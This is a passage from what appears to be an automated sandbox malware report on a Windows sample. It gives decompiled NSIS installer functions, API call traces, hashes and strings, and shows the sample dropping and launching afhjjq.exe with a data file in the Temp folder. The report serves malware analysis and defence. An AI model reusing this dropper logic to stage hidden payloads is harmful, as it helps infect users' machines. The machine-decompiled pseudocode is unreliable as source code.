                            • EnableMenuItem.USER32 ref: 004043E4
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                            • String ID: H7B
                            • API String ID: 2475350683-2300413410
                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                            C-Code - Quality: 96%
                            			E00403D17(void* __eflags) {
                            				intOrPtr _v4;
                            				intOrPtr _v8;
                            				int _v12;
                            				void _v16;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t22;
                            				void* _t30;
                            				void* _t32;
                            				int _t33;
                            				void* _t36;
                            				int _t39;
                            				int _t40;
                            				int _t44;
                            				short _t63;
                            				WCHAR* _t65;
                            				signed char _t69;
                            				WCHAR* _t76;
                            				intOrPtr _t82;
                            				WCHAR* _t87;
                            
                            				_t82 =  *0x42a270;
                            				_t22 = E00406A35(2);
                            				_t90 = _t22;
                            				if(_t22 == 0) {
                            					_t76 = 0x423748;
                            					L"1033" = 0x30;
                            					 *0x437002 = 0x78;
                            					 *0x437004 = 0;
                            					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                            					__eflags =  *0x423748;
                            					if(__eflags == 0) {
                            						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                            					}
                            					lstrcatW(L"1033", _t76);
                            				} else {
                            					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                            				}
                            				E00403FED(_t78, _t90);
                            				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Temp";
                            				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                            				 *0x42a2fc = 0x10000;
                            				if(E0040603F(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                            					L16:
                            					if(E0040603F(_t98, _t86) == 0) {
                            						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                            					}
                            					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                            					 *0x429248 = _t30;
                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                            						L21:
                            						if(E0040140B(0) == 0) {
                            							_t32 = E00403FED(_t78, __eflags);
                            							__eflags =  *0x42a300;
                            							if( *0x42a300 != 0) {
                            								_t33 = E0040579D(_t32, 0);
                            								__eflags = _t33;
                            								if(_t33 == 0) {
                            									E0040140B(1);
                            									goto L33;
                            								}
                            								__eflags =  *0x42922c;
                            								if( *0x42922c == 0) {
                            									E0040140B(2);
                            								}
                            								goto L22;
                            							}
                            							ShowWindow( *0x423728, 5); // executed
                            							_t39 = E004069C5("RichEd20"); // executed
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								E004069C5("RichEd32");
                            							}
                            							_t87 = L"RichEdit20W";
                            							_t40 = GetClassInfoW(0, _t87, 0x429200);
                            							__eflags = _t40;
                            							if(_t40 == 0) {
                            								GetClassInfoW(0, L"RichEdit", 0x429200);
                            								 *0x429224 = _t87;
                            								RegisterClassW(0x429200);
                            							}
                            							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                            							E00403C67(E0040140B(5), 1);
                            							return _t44;
                            						}
                            						L22:
                            						_t36 = 2;
                            						return _t36;
                            					} else {
                            						_t78 =  *0x42a260;
                            						 *0x429204 = E00401000;
                            						 *0x429210 =  *0x42a260;
                            						 *0x429214 = _t30;
                            						 *0x429224 = 0x40a3b4;
                            						if(RegisterClassW(0x429200) == 0) {
                            							L33:
                            							__eflags = 0;
                            							return 0;
                            						}
                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                            						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                            						goto L21;
                            					}
                            				} else {
                            					_t78 =  *(_t82 + 0x48);
                            					_t92 = _t78;
                            					if(_t78 == 0) {
                            						goto L16;
                            					}
                            					_t76 = 0x428200;
                            					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                            					_t63 =  *0x428200; // 0x22
                            					if(_t63 == 0) {
                            						goto L16;
                            					}
                            					if(_t63 == 0x22) {
                            						_t76 = 0x428202;
                            						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                            					}
                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                            						L15:
                            						E00406668(_t86, E00405F37(_t76));
                            						goto L16;
                            					} else {
                            						_t69 = GetFileAttributesW(_t76);
                            						if(_t69 == 0xffffffff) {
                            							L14:
                            							E00405F83(_t76);
                            							goto L15;
                            						}
                            						_t98 = _t69 & 0x00000010;
                            						if((_t69 & 0x00000010) != 0) {
                            							goto L15;
                            						}
                            						goto L14;
                            					}
                            				}
                            			}

























                            APIs
                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,766DFAA0), ref: 00403E18
                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                            • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,00000000,?), ref: 00403E36
                            • LoadImageW.USER32 ref: 00403E7F
                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                            • RegisterClassW.USER32 ref: 00403EBC
                            • SystemParametersInfoW.USER32 ref: 00403ED4
                            • CreateWindowExW.USER32 ref: 00403F09
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                            • GetClassInfoW.USER32 ref: 00403F6B
                            • GetClassInfoW.USER32 ref: 00403F78
                            • RegisterClassW.USER32 ref: 00403F81
                            • DialogBoxParamW.USER32 ref: 00403FA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 1975747703-2468761926
                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                            C-Code - Quality: 98%
                            			E004030D0(void* __eflags, signed int _a4) {
                            				DWORD* _v8;
                            				DWORD* _v12;
                            				intOrPtr _v16;
                            				long _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				short _v560;
                            				long _t54;
                            				void* _t57;
                            				void* _t62;
                            				intOrPtr _t65;
                            				void* _t68;
                            				intOrPtr* _t70;
                            				long _t82;
                            				signed int _t89;
                            				intOrPtr _t92;
                            				long _t94;
                            				void* _t102;
                            				void* _t106;
                            				long _t107;
                            				long _t110;
                            				void* _t111;
                            
                            				_t94 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				 *0x42a26c = GetTickCount() + 0x3e8;
                            				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x400);
                            				_t106 = E00406158(L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x80000000, 3);
                            				 *0x40a018 = _t106;
                            				if(_t106 == 0xffffffff) {
                            					return L"Error launching installer";
                            				}
                            				E00406668(0x436800, L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe");
                            				E00406668(0x439000, E00405F83(0x436800));
                            				_t54 = GetFileSize(_t106, 0);
                            				 *0x420f00 = _t54;
                            				_t110 = _t54;
                            				if(_t54 <= 0) {
                            					L24:
                            					E0040302E(1);
                            					if( *0x42a274 == _t94) {
                            						goto L32;
                            					}
                            					if(_v12 == _t94) {
                            						L28:
                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                            						_t111 = _t57;
                            						E00406B90(0x40ce68);
                            						E00406187(0x40ce68,  &_v560, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
                            						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                            						 *0x40a01c = _t62;
                            						if(_t62 != 0xffffffff) {
                            							_t65 = E004035F8( *0x42a274 + 0x1c);
                            							 *0x420f04 = _t65;
                            							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                            							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                            							if(_t68 == _v20) {
                            								 *0x42a270 = _t111;
                            								 *0x42a278 =  *_t111;
                            								if((_v40 & 0x00000001) != 0) {
                            									 *0x42a27c =  *0x42a27c + 1;
                            								}
                            								_t45 = _t111 + 0x44; // 0x44
                            								_t70 = _t45;
                            								_t102 = 8;
                            								do {
                            									_t70 = _t70 - 8;
                            									 *_t70 =  *_t70 + _t111;
                            									_t102 = _t102 - 1;
                            								} while (_t102 != 0);
                            								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                            								E00406113(0x42a280, _t111 + 4, 0x40);
                            								return 0;
                            							}
                            							goto L32;
                            						}
                            						return L"Error writing temporary file. Make sure your temp folder is valid.";
                            					}
                            					E004035F8( *0x420ef0);
                            					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                            						goto L32;
                            					} else {
                            						goto L28;
                            					}
                            				} else {
                            					do {
                            						_t107 = _t110;
                            						asm("sbb eax, eax");
                            						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                            						if(_t110 >= _t82) {
                            							_t107 = _t82;
                            						}
                            						if(E004035E2(0x418ef0, _t107) == 0) {
                            							E0040302E(1);
                            							L32:
                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                            						}
                            						if( *0x42a274 != 0) {
                            							if((_a4 & 0x00000002) == 0) {
                            								E0040302E(0);
                            							}
                            							goto L20;
                            						}
                            						E00406113( &_v40, 0x418ef0, 0x1c);
                            						_t89 = _v40;
                            						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                            							_a4 = _a4 | _t89;
                            							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                            							_t92 = _v16;
                            							 *0x42a274 =  *0x420ef0;
                            							if(_t92 > _t110) {
                            								goto L32;
                            							}
                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                            								_v12 = _v12 + 1;
                            								_t110 = _t92 - 4;
                            								if(_t107 > _t110) {
                            									_t107 = _t110;
                            								}
                            								goto L20;
                            							} else {
                            								break;
                            							}
                            						}
                            						L20:
                            						if(_t110 <  *0x420f00) {
                            							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                            						}
                            						 *0x420ef0 =  *0x420ef0 + _t107;
                            						_t110 = _t110 - _t107;
                            					} while (_t110 != 0);
                            					_t94 = 0;
                            					goto L24;
                            				}
                            			}





























                            APIs
                            • GetTickCount.KERNEL32 ref: 004030E4
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\YSpCB8DEek.exe,00000400), ref: 00403100
                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\YSpCB8DEek.exe,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 00403149
                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\YSpCB8DEek.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                            • API String ID: 2803837635-52966638
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                            C-Code - Quality: 77%
                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                            				void* __esi;
                            				void* _t35;
                            				void* _t43;
                            				void* _t45;
                            				FILETIME* _t51;
                            				FILETIME* _t64;
                            				void* _t66;
                            				signed int _t72;
                            				FILETIME* _t73;
                            				FILETIME* _t77;
                            				signed int _t79;
                            				WCHAR* _t81;
                            				void* _t83;
                            				void* _t84;
                            				void* _t86;
                            
                            				_t77 = __ebx;
                            				 *(_t86 - 8) = E00402DA6(0x31);
                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                            				_t35 = E00405FAE( *(_t86 - 8));
                            				_push( *(_t86 - 8));
                            				_t81 = L"\"C:\\";
                            				if(_t35 == 0) {
                            					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                            				} else {
                            					E00406668();
                            				}
                            				E004068EF(_t81);
                            				while(1) {
                            					__eflags =  *(_t86 + 8) - 3;
                            					if( *(_t86 + 8) >= 3) {
                            						_t66 = E0040699E(_t81);
                            						_t79 = 0;
                            						__eflags = _t66 - _t77;
                            						if(_t66 != _t77) {
                            							_t73 = _t66 + 0x14;
                            							__eflags = _t73;
                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                            						}
                            						asm("sbb eax, eax");
                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                            						__eflags = _t72;
                            						 *(_t86 + 8) = _t72;
                            					}
                            					__eflags =  *(_t86 + 8) - _t77;
                            					if( *(_t86 + 8) == _t77) {
                            						E00406133(_t81);
                            					}
                            					__eflags =  *(_t86 + 8) - 1;
                            					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                            					__eflags = _t43 - 0xffffffff;
                            					 *(_t86 - 0x38) = _t43;
                            					if(_t43 != 0xffffffff) {
                            						break;
                            					}
                            					__eflags =  *(_t86 + 8) - _t77;
                            					if( *(_t86 + 8) != _t77) {
                            						E004056CA(0xffffffe2,  *(_t86 - 8));
                            						__eflags =  *(_t86 + 8) - 2;
                            						if(__eflags == 0) {
                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                            						}
                            						L31:
                            						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                            						__eflags =  *0x42a2e8;
                            						goto L32;
                            					} else {
                            						E00406668(0x40b5f8, _t83);
                            						E00406668(_t83, _t81);
                            						E004066A5(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                            						E00406668(_t83, 0x40b5f8);
                            						_t64 = E00405CC8("C:\Users\alfons\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                            						__eflags = _t64;
                            						if(_t64 == 0) {
                            							continue;
                            						} else {
                            							__eflags = _t64 == 1;
                            							if(_t64 == 1) {
                            								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                            								L32:
                            								_t51 = 0;
                            								__eflags = 0;
                            							} else {
                            								_push(_t81);
                            								_push(0xfffffffa);
                            								E004056CA();
                            								L29:
                            								_t51 = 0x7fffffff;
                            							}
                            						}
                            					}
                            					L33:
                            					return _t51;
                            				}
                            				E004056CA(0xffffffea,  *(_t86 - 8));
                            				 *0x42a314 =  *0x42a314 + 1;
                            				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                            				 *0x42a314 =  *0x42a314 - 1;
                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                            				_t84 = _t45;
                            				if( *(_t86 - 0x24) != 0xffffffff) {
                            					L22:
                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                            				} else {
                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                            						goto L22;
                            					}
                            				}
                            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                            				__eflags = _t84 - _t77;
                            				if(_t84 >= _t77) {
                            					goto L31;
                            				} else {
                            					__eflags = _t84 - 0xfffffffe;
                            					if(_t84 != 0xfffffffe) {
                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                            					} else {
                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                            						lstrcatW(_t81,  *(_t86 - 8));
                            					}
                            					_push(0x200010);
                            					_push(_t81);
                            					E00405CC8();
                            					goto L29;
                            				}
                            				goto L33;
                            			}



















                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00000000,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00436000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$C:\Users\user\AppData\Local\Temp
                            • API String ID: 1941528284-3160454279
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                            C-Code - Quality: 100%
                            			E004069C5(intOrPtr _a4) {
                            				short _v576;
                            				signed int _t13;
                            				struct HINSTANCE__* _t17;
                            				signed int _t19;
                            				void* _t24;
                            
                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                            				if(_t13 > 0x104) {
                            					_t13 = 0;
                            				}
                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                            					_t19 = 1;
                            				} else {
                            					_t19 = 0;
                            				}
                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                            				return _t17;
                            			}









                            APIs
